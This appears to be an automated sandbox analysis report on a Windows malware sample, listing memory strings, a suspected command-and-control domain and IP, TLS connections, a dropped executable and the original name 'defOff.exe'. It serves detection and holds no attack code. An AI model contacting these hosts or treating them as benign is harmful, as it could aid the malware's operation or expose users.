Source: file.exe, 00000000.00000003.1581702066.0000000000E16000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1724509005.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1582388699.0000000000E16000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1724509005.0000000000D90000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1516669230.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722621117.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1566593101.0000000000E12000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722621117.0000000000D90000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/
Source: file.exe, 00000000.00000002.1724509005.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722621117.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/Hy
Source: file.exe, 00000000.00000003.1722841252.0000000000E00000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722535596.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1582388699.0000000000E16000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1724682643.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722966478.0000000000DF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722841252.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1724772459.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1581573293.0000000000E02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/api
Source: file.exe, 00000000.00000003.1581573293.0000000000E02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/api/
Source: file.exe, 00000000.00000003.1593633698.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722535596.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1724772459.0000000000E15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/apiAE
Source: file.exe, 00000000.00000003.1593633698.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722535596.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1724772459.0000000000E15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/apit
Source: file.exe, 00000000.00000003.1548543584.00000000055D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/au
Source: file.exe, 00000000.00000003.1548543584.00000000055D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/e
Source: file.exe, 00000000.00000003.1516669230.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/o
Source: file.exe, 00000000.00000003.1517531200.0000000005608000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.1517531200.0000000005608000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.1517531200.0000000005608000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000003.1550572571.0000000000E27000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
Source: file.exe, 00000000.00000003.1550224153.00000000058FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: file.exe, 00000000.00000003.1550224153.00000000058FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: file.exe, 00000000.00000003.1550572571.0000000000E27000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
Source: file.exe, 00000000.00000003.1517531200.0000000005608000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.1517531200.0000000005608000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000000.00000003.1550572571.0000000000E27000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: file.exe, 00000000.00000003.1550064219.000000000566F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000003.1550224153.00000000058FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: file.exe, 00000000.00000003.1550224153.00000000058FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: file.exe, 00000000.00000003.1550224153.00000000058FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.1550224153.00000000058FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.8:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.8:49713 version: TLS 1.2

System Summary
barindex
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: 94JSCZGRDUWCLDEBY2HC1S58YAX1.exe.0.dr Static PE information: section name:
Source: 94JSCZGRDUWCLDEBY2HC1S58YAX1.exe.0.dr Static PE information: section name: .idata
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E195CF 0_3_00E195CF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E195CF 0_3_00E195CF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E195CF 0_3_00E195CF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E195CF 0_3_00E195CF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E195CF 0_3_00E195CF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E195CF 0_3_00E195CF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E195CF 0_3_00E195CF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E195CF 0_3_00E195CF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E195CF 0_3_00E195CF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E195CF 0_3_00E195CF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E195CF 0_3_00E195CF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E195CF 0_3_00E195CF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E195CF 0_3_00E195CF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E195CF 0_3_00E195CF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E195CF 0_3_00E195CF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E195CF 0_3_00E195CF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E195CF 0_3_00E195CF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E195CF 0_3_00E195CF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E195CF 0_3_00E195CF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E195CF 0_3_00E195CF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E195CF 0_3_00E195CF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E195CF 0_3_00E195CF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E195CF 0_3_00E195CF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E195CF 0_3_00E195CF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E195CF 0_3_00E195CF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E195CF 0_3_00E195CF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E195CF 0_3_00E195CF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E195CF 0_3_00E195CF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E195CF 0_3_00E195CF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E195CF 0_3_00E195CF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E195CF 0_3_00E195CF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E195CF 0_3_00E195CF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E195CF 0_3_00E195CF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E195CF 0_3_00E195CF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E195CF 0_3_00E195CF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E195CF 0_3_00E195CF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E195CF 0_3_00E195CF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E195CF 0_3_00E195CF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E195CF 0_3_00E195CF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E195CF 0_3_00E195CF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E195CF 0_3_00E195CF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E195CF 0_3_00E195CF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00D8D9F2 0_3_00D8D9F2
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00DAB282 0_3_00DAB282
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00DAB2AF 0_3_00DAB2AF
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0087EC20 0_2_0087EC20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0088104F 0_2_0088104F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00880460 0_2_00880460
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0087E1A0 0_2_0087E1A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008979B0 0_2_008979B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0088D7F8 0_2_0088D7F8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0089AB20 0_2_0089AB20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0087F755 0_2_0087F755
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008814CE 0_2_008814CE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008930E0 0_2_008930E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008910FF 0_2_008910FF
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008AB0F0 0_2_008AB0F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00875000 0_2_00875000
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0088D010 0_2_0088D010
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0088CC20 0_2_0088CC20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0088E837 0_2_0088E837
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008B5040 0_2_008B5040
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00878460 0_2_00878460
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0088E07E 0_2_0088E07E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00886997 0_2_00886997
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0087ADB0 0_2_0087ADB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008865D7 0_2_008865D7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008791E9 0_2_008791E9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00891100 0_2_00891100
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00876D10 0_2_00876D10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0089091E 0_2_0089091E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00873930 0_2_00873930
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0088ED48 0_2_0088ED48
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0087BD50 0_2_0087BD50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0087DA80 0_2_0087DA80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008AAE90 0_2_008AAE90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008B3A90 0_2_008B3A90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00891EC5 0_2_00891EC5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00878EF0 0_2_00878EF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00873886 0_2_00873886
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00884A4C 0_2_00884A4C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0088FA4F 0_2_0088FA4F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00883E45 0_2_00883E45
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0087A260 0_2_0087A260
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0089CBD0 0_2_0089CBD0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00879FF5 0_2_00879FF5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0087A720 0_2_0087A720
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00877B67 0_2_00877B67
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0087DF60 0_2_0087DF60
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Code function: 3_2_00565966 3_2_00565966
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Code function: 3_2_006E3F65 3_2_006E3F65
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\file.exe Code function: String function: 0087C890 appears 40 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 0087E190 appears 76 times
Sample file is different than original file name gathered from version info
Source: file.exe Binary or memory string: OriginalFilename vs file.exe
Source: file.exe, 00000000.00000003.1701039280.0000000005BAE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1705478317.0000000005BBB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1703625316.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1698641777.0000000005B9C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1692604897.0000000005BC9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1691903804.0000000005A7A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1696832744.0000000005C70000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1694668153.0000000005B4E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1698281938.0000000005B82000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1692515448.0000000005B1D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1702724946.0000000005BAE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1688991847.0000000005B1B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1692422559.0000000005A76000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1688750570.0000000005A7F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1697989986.0000000005B90000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1693057445.0000000005A72000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1693871949.0000000005B3C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1706626900.0000000005A80000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1691807943.00000000058D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1699260433.0000000005CC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1697493022.0000000005A72000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1703978099.0000000005A77000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1696165061.0000000005B64000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1706178582.0000000005A80000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1698879077.0000000005B98000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1689072701.0000000005A81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1689140816.0000000005B1F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1706476622.0000000005D1F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1700495358.0000000005A7A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1695741172.0000000005B67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1706060227.0000000005D05000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1693152717.0000000005B30000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1697876289.0000000005A73000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1695528867.0000000005C4F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1692219289.0000000005BCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1694475374.0000000005A7B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1688831240.0000000005B21000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1697274192.0000000005B72000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1696061769.0000000005A74000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1722448530.00000000055D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1693343064.0000000005A77000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1699382892.0000000005A80000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1692966752.0000000005B25000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1694373069.0000000005B4A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1688910463.0000000005A7F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1696386807.0000000005B64000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1698761229.0000000005A7F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1693777935.0000000005A72000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1692700257.0000000005A7B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1705313804.0000000005A7B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1692145020.0000000005B1F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1701908203.0000000005A77000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1695952801.0000000005B69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1694162065.0000000005B49000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1703358373.0000000005A7C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1695850243.0000000005A7D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1698522844.0000000005A7A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1694261262.0000000005A7C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1694771183.0000000005A74000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1705161156.0000000005BB2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1704207586.0000000005BBC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1706330576.0000000005BC2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1696494543.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1695634528.0000000005A7B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1692892270.0000000005A79000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1696941357.0000000005A81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1693435737.0000000005B3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1692064931.0000000005A72000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1720947738.0000000005A78000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1699131843.0000000005B94000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1694064884.0000000005A81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1692795611.0000000005B2B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1695196371.0000000005B5F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1693247360.0000000005BEF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1696279793.0000000005A74000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1697643062.0000000005B81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1722156149.00000000055F5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1693604629.0000000005B32000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1693968225.0000000005C0B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1704516578.0000000005A7A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1722841252.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
